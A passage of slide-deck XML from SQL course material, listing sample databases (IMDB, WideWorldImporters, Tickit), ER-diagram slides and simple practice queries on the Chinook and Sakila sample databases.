                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>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rgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>PostGres</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>PostGres</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="323825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Movie collection</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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000">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>IMDB</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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0025">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1900"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>WideWorldImporters</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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900"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>WideWorldImporters</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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900"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1"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1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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Clr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MicroSoft SQL Server</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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 sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Microsoft</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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10025">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Tickit </a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Tickit </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Download</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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10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1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Amazon RedShift</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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 sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Amazon</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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1" name="Shape 3311"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3312" name="Google Shape;3312;p535"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3996075" y="152400"/>
            <a:ext cx="4783716" cy="4838701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3313" name="Google Shape;3313;p535"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243750" y="376100"/>
            <a:ext cx="3890700" cy="12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F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Entity Relationship</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ER Diagrams</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:srgbClr val="F1C232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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7" name="Shape 3317"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3318" name="Google Shape;3318;p536"/>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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chinook - Simple SQL Questions</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3319" name="Google Shape;3319;p5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sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve all columns from the "customers" table.</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Display the names of all tracks in the "tracks" table.</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List all unique genres from the "genres" table.</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Find the total number of tracks in the "tracks" table.</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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Show the names of all albums along with their artists.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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3" name="Shape 3323"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3324" name="Google Shape;3324;p537"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376700" y="2409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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Answer 3</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3325" name="Google Shape;3325;p537"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11026" l="0" r="57556" t="21615"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935000" y="813650"/>
            <a:ext cx="4750723" cy="4240849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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538"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="1400475"/>
            <a:ext cx="8588100" cy="3386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3600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SHAKILA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sample tables:</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3331" name="Google Shape;3331;p538"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957300" y="611325"/>
            <a:ext cx="73161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SQL Assignments 5</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3336" name="Google Shape;3336;p539"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="606" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1672200" y="167575"/>
            <a:ext cx="7343875" cy="4879250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3337" name="Google Shape;3337;p539"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186700" y="327000"/>
            <a:ext cx="3045300" cy="8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1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Entity Relationship</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ER Diagrams</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="F1C232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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1" name="Shape 3341"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3342" name="Google Shape;3342;p540"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="0"/>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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sakila </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Simple SQL Questions</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3343" name="Google Shape;3343;p540"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105500" y="619075"/>
            <a:ext cx="4359300" cy="4524300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-281940" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="840"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve all columns from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="835">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>film</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> table.</a:t>
            </a:r>
            <a:endParaRPr sz="939">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-281940" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="840"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Show the first 10 rows from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="835">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>actor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> table.</a:t>
            </a:r>
            <a:endParaRPr sz="939">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-281940" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="840"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Count the number of records in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="835">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> table.</a:t>
            </a:r>
            <a:endParaRPr sz="939">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-281940" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="840"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>List unique values in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="835">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>rating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> column of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="835">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>film</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> table.</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Retrieve the title and release year of films released in 2006.</a:t>
            </a:r>
            <a:endParaRPr sz="939">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-281940" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="840"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Find the total number of customers in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="835">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>customer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> table.</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List the names of customers in alphabetical order.</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Show the rental rate and replacement cost of films with a rental rate greater than 4.</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Retrieve the film title, rental rate, and length of films with a length greater than 120 minutes.</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Count the number of films in each rating category.</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List the first and last names of customers who have an email address ending with '@gmail.com'.</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Find the average rental duration of films.</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Retrieve the titles of films that are both in the 'Horror' and 'Sci-Fi' categories.</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Show the total number of rentals for each customer.</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List the films that have not been rented.</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Find the top 5 customers who have made the most rentals.</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Show the average replacement cost of films in each rating category.</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Retrieve the names of actors who have appeared in more than 20 films.</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List the films that are not in the 'Documentary' category.</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Find the total revenue generated by each customer.</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Show the average rental rate for each category.</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Retrieve the films that were rented on '2005-08-01'.</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List the films and their respective actors.</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Count the number of films in each language.</a:t>
            </a:r>
            <a:endParaRPr sz="939">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-288290" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="940"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="939">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve the films with the highest replacement cost.</a:t>
            </a:r>
            <a:endParaRPr sz="939">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3344" name="Google Shape;3344;p540"/>
